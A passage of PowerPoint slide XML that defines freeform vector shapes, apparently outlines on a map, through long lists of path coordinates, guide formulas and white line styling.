                    <a:lnTo>
                      <a:pt x="613" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="618" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="616" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="576" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="566" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="564" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="563" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="553" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="553" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="555" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="555" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="542" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="542" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="427"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="508" y="448"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="486" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="481" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="471" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="464" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="464"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="444" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="490"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="500"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="506"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="512"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="560"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="565"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="576"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="607"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="607"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="597"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="589"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="606"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="612"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="333" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="652"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="643"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="632"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="618"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="606"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="592"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="532"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="513"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="504"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36089" name="Freeform 222"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1936" y="2947"/>
                <a:ext cx="35" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 35"/>
                  <a:gd name="T1" fmla="*/ 24 h 24"/>
                  <a:gd name="T2" fmla="*/ 2 w 35"/>
                  <a:gd name="T3" fmla="*/ 23 h 24"/>
                  <a:gd name="T4" fmla="*/ 0 w 35"/>
                  <a:gd name="T5" fmla="*/ 19 h 24"/>
                  <a:gd name="T6" fmla="*/ 0 w 35"/>
                  <a:gd name="T7" fmla="*/ 17 h 24"/>
                  <a:gd name="T8" fmla="*/ 1 w 35"/>
                  <a:gd name="T9" fmla="*/ 15 h 24"/>
                  <a:gd name="T10" fmla="*/ 0 w 35"/>
                  <a:gd name="T11" fmla="*/ 11 h 24"/>
                  <a:gd name="T12" fmla="*/ 0 w 35"/>
                  <a:gd name="T13" fmla="*/ 8 h 24"/>
                  <a:gd name="T14" fmla="*/ 2 w 35"/>
                  <a:gd name="T15" fmla="*/ 1 h 24"/>
                  <a:gd name="T16" fmla="*/ 3 w 35"/>
                  <a:gd name="T17" fmla="*/ 0 h 24"/>
                  <a:gd name="T18" fmla="*/ 7 w 35"/>
                  <a:gd name="T19" fmla="*/ 0 h 24"/>
                  <a:gd name="T20" fmla="*/ 13 w 35"/>
                  <a:gd name="T21" fmla="*/ 0 h 24"/>
                  <a:gd name="T22" fmla="*/ 20 w 35"/>
                  <a:gd name="T23" fmla="*/ 1 h 24"/>
                  <a:gd name="T24" fmla="*/ 23 w 35"/>
                  <a:gd name="T25" fmla="*/ 0 h 24"/>
                  <a:gd name="T26" fmla="*/ 26 w 35"/>
                  <a:gd name="T27" fmla="*/ 0 h 24"/>
                  <a:gd name="T28" fmla="*/ 29 w 35"/>
                  <a:gd name="T29" fmla="*/ 1 h 24"/>
                  <a:gd name="T30" fmla="*/ 33 w 35"/>
                  <a:gd name="T31" fmla="*/ 2 h 24"/>
                  <a:gd name="T32" fmla="*/ 35 w 35"/>
                  <a:gd name="T33" fmla="*/ 3 h 24"/>
                  <a:gd name="T34" fmla="*/ 33 w 35"/>
                  <a:gd name="T35" fmla="*/ 7 h 24"/>
                  <a:gd name="T36" fmla="*/ 31 w 35"/>
                  <a:gd name="T37" fmla="*/ 13 h 24"/>
                  <a:gd name="T38" fmla="*/ 29 w 35"/>
                  <a:gd name="T39" fmla="*/ 17 h 24"/>
                  <a:gd name="T40" fmla="*/ 27 w 35"/>
                  <a:gd name="T41" fmla="*/ 19 h 24"/>
                  <a:gd name="T42" fmla="*/ 23 w 35"/>
                  <a:gd name="T43" fmla="*/ 21 h 24"/>
                  <a:gd name="T44" fmla="*/ 20 w 35"/>
                  <a:gd name="T45" fmla="*/ 23 h 24"/>
                  <a:gd name="T46" fmla="*/ 16 w 35"/>
                  <a:gd name="T47" fmla="*/ 23 h 24"/>
                  <a:gd name="T48" fmla="*/ 11 w 35"/>
                  <a:gd name="T49" fmla="*/ 23 h 24"/>
                  <a:gd name="T50" fmla="*/ 6 w 35"/>
                  <a:gd name="T51" fmla="*/ 24 h 24"/>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35"/>
                  <a:gd name="T79" fmla="*/ 0 h 24"/>
                  <a:gd name="T80" fmla="*/ 35 w 35"/>
                  <a:gd name="T81" fmla="*/ 24 h 24"/>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35" h="24">
                    <a:moveTo>
                      <a:pt x="6" y="24"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="24"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36090" name="Freeform 223"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2997" y="2061"/>
                <a:ext cx="108" cy="66"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 41 w 108"/>
                  <a:gd name="T1" fmla="*/ 63 h 66"/>
                  <a:gd name="T2" fmla="*/ 36 w 108"/>
                  <a:gd name="T3" fmla="*/ 65 h 66"/>
                  <a:gd name="T4" fmla="*/ 33 w 108"/>
                  <a:gd name="T5" fmla="*/ 65 h 66"/>
                  <a:gd name="T6" fmla="*/ 28 w 108"/>
                  <a:gd name="T7" fmla="*/ 66 h 66"/>
                  <a:gd name="T8" fmla="*/ 24 w 108"/>
                  <a:gd name="T9" fmla="*/ 65 h 66"/>
                  <a:gd name="T10" fmla="*/ 16 w 108"/>
                  <a:gd name="T11" fmla="*/ 58 h 66"/>
                  <a:gd name="T12" fmla="*/ 6 w 108"/>
                  <a:gd name="T13" fmla="*/ 51 h 66"/>
                  <a:gd name="T14" fmla="*/ 5 w 108"/>
                  <a:gd name="T15" fmla="*/ 49 h 66"/>
                  <a:gd name="T16" fmla="*/ 2 w 108"/>
                  <a:gd name="T17" fmla="*/ 46 h 66"/>
                  <a:gd name="T18" fmla="*/ 0 w 108"/>
                  <a:gd name="T19" fmla="*/ 40 h 66"/>
                  <a:gd name="T20" fmla="*/ 2 w 108"/>
                  <a:gd name="T21" fmla="*/ 37 h 66"/>
                  <a:gd name="T22" fmla="*/ 4 w 108"/>
                  <a:gd name="T23" fmla="*/ 34 h 66"/>
                  <a:gd name="T24" fmla="*/ 2 w 108"/>
                  <a:gd name="T25" fmla="*/ 32 h 66"/>
                  <a:gd name="T26" fmla="*/ 2 w 108"/>
                  <a:gd name="T27" fmla="*/ 28 h 66"/>
                  <a:gd name="T28" fmla="*/ 5 w 108"/>
                  <a:gd name="T29" fmla="*/ 27 h 66"/>
                  <a:gd name="T30" fmla="*/ 6 w 108"/>
                  <a:gd name="T31" fmla="*/ 25 h 66"/>
                  <a:gd name="T32" fmla="*/ 5 w 108"/>
                  <a:gd name="T33" fmla="*/ 23 h 66"/>
                  <a:gd name="T34" fmla="*/ 2 w 108"/>
                  <a:gd name="T35" fmla="*/ 22 h 66"/>
                  <a:gd name="T36" fmla="*/ 4 w 108"/>
                  <a:gd name="T37" fmla="*/ 20 h 66"/>
                  <a:gd name="T38" fmla="*/ 6 w 108"/>
                  <a:gd name="T39" fmla="*/ 20 h 66"/>
                  <a:gd name="T40" fmla="*/ 7 w 108"/>
                  <a:gd name="T41" fmla="*/ 21 h 66"/>
                  <a:gd name="T42" fmla="*/ 12 w 108"/>
                  <a:gd name="T43" fmla="*/ 21 h 66"/>
                  <a:gd name="T44" fmla="*/ 12 w 108"/>
                  <a:gd name="T45" fmla="*/ 17 h 66"/>
                  <a:gd name="T46" fmla="*/ 17 w 108"/>
                  <a:gd name="T47" fmla="*/ 14 h 66"/>
                  <a:gd name="T48" fmla="*/ 19 w 108"/>
                  <a:gd name="T49" fmla="*/ 12 h 66"/>
                  <a:gd name="T50" fmla="*/ 22 w 108"/>
                  <a:gd name="T51" fmla="*/ 14 h 66"/>
                  <a:gd name="T52" fmla="*/ 26 w 108"/>
                  <a:gd name="T53" fmla="*/ 16 h 66"/>
                  <a:gd name="T54" fmla="*/ 29 w 108"/>
                  <a:gd name="T55" fmla="*/ 16 h 66"/>
                  <a:gd name="T56" fmla="*/ 41 w 108"/>
                  <a:gd name="T57" fmla="*/ 17 h 66"/>
                  <a:gd name="T58" fmla="*/ 43 w 108"/>
                  <a:gd name="T59" fmla="*/ 11 h 66"/>
                  <a:gd name="T60" fmla="*/ 45 w 108"/>
                  <a:gd name="T61" fmla="*/ 11 h 66"/>
                  <a:gd name="T62" fmla="*/ 50 w 108"/>
                  <a:gd name="T63" fmla="*/ 9 h 66"/>
                  <a:gd name="T64" fmla="*/ 54 w 108"/>
                  <a:gd name="T65" fmla="*/ 8 h 66"/>
                  <a:gd name="T66" fmla="*/ 58 w 108"/>
                  <a:gd name="T67" fmla="*/ 9 h 66"/>
                  <a:gd name="T68" fmla="*/ 61 w 108"/>
                  <a:gd name="T69" fmla="*/ 9 h 66"/>
                  <a:gd name="T70" fmla="*/ 68 w 108"/>
                  <a:gd name="T71" fmla="*/ 0 h 66"/>
                  <a:gd name="T72" fmla="*/ 74 w 108"/>
                  <a:gd name="T73" fmla="*/ 0 h 66"/>
                  <a:gd name="T74" fmla="*/ 81 w 108"/>
                  <a:gd name="T75" fmla="*/ 0 h 66"/>
                  <a:gd name="T76" fmla="*/ 85 w 108"/>
                  <a:gd name="T77" fmla="*/ 3 h 66"/>
                  <a:gd name="T78" fmla="*/ 88 w 108"/>
                  <a:gd name="T79" fmla="*/ 5 h 66"/>
                  <a:gd name="T80" fmla="*/ 93 w 108"/>
                  <a:gd name="T81" fmla="*/ 4 h 66"/>
                  <a:gd name="T82" fmla="*/ 94 w 108"/>
                  <a:gd name="T83" fmla="*/ 4 h 66"/>
                  <a:gd name="T84" fmla="*/ 99 w 108"/>
                  <a:gd name="T85" fmla="*/ 7 h 66"/>
                  <a:gd name="T86" fmla="*/ 103 w 108"/>
                  <a:gd name="T87" fmla="*/ 9 h 66"/>
                  <a:gd name="T88" fmla="*/ 108 w 108"/>
                  <a:gd name="T89" fmla="*/ 13 h 66"/>
                  <a:gd name="T90" fmla="*/ 104 w 108"/>
                  <a:gd name="T91" fmla="*/ 17 h 66"/>
                  <a:gd name="T92" fmla="*/ 96 w 108"/>
                  <a:gd name="T93" fmla="*/ 20 h 66"/>
                  <a:gd name="T94" fmla="*/ 92 w 108"/>
                  <a:gd name="T95" fmla="*/ 24 h 66"/>
                  <a:gd name="T96" fmla="*/ 85 w 108"/>
                  <a:gd name="T97" fmla="*/ 39 h 66"/>
                  <a:gd name="T98" fmla="*/ 81 w 108"/>
                  <a:gd name="T99" fmla="*/ 48 h 66"/>
                  <a:gd name="T100" fmla="*/ 75 w 108"/>
                  <a:gd name="T101" fmla="*/ 54 h 66"/>
                  <a:gd name="T102" fmla="*/ 73 w 108"/>
                  <a:gd name="T103" fmla="*/ 56 h 66"/>
                  <a:gd name="T104" fmla="*/ 67 w 108"/>
                  <a:gd name="T105" fmla="*/ 56 h 66"/>
                  <a:gd name="T106" fmla="*/ 66 w 108"/>
                  <a:gd name="T107" fmla="*/ 57 h 66"/>
                  <a:gd name="T108" fmla="*/ 64 w 108"/>
                  <a:gd name="T109" fmla="*/ 57 h 66"/>
                  <a:gd name="T110" fmla="*/ 58 w 108"/>
                  <a:gd name="T111" fmla="*/ 56 h 66"/>
                  <a:gd name="T112" fmla="*/ 51 w 108"/>
                  <a:gd name="T113" fmla="*/ 57 h 66"/>
                  <a:gd name="T114" fmla="*/ 41 w 108"/>
                  <a:gd name="T115" fmla="*/ 63 h 6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08"/>
                  <a:gd name="T175" fmla="*/ 0 h 66"/>
                  <a:gd name="T176" fmla="*/ 108 w 108"/>
                  <a:gd name="T177" fmla="*/ 66 h 6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08" h="66">
                    <a:moveTo>
                      <a:pt x="41" y="63"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="36" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="4"/>
                    </a:lnTo>
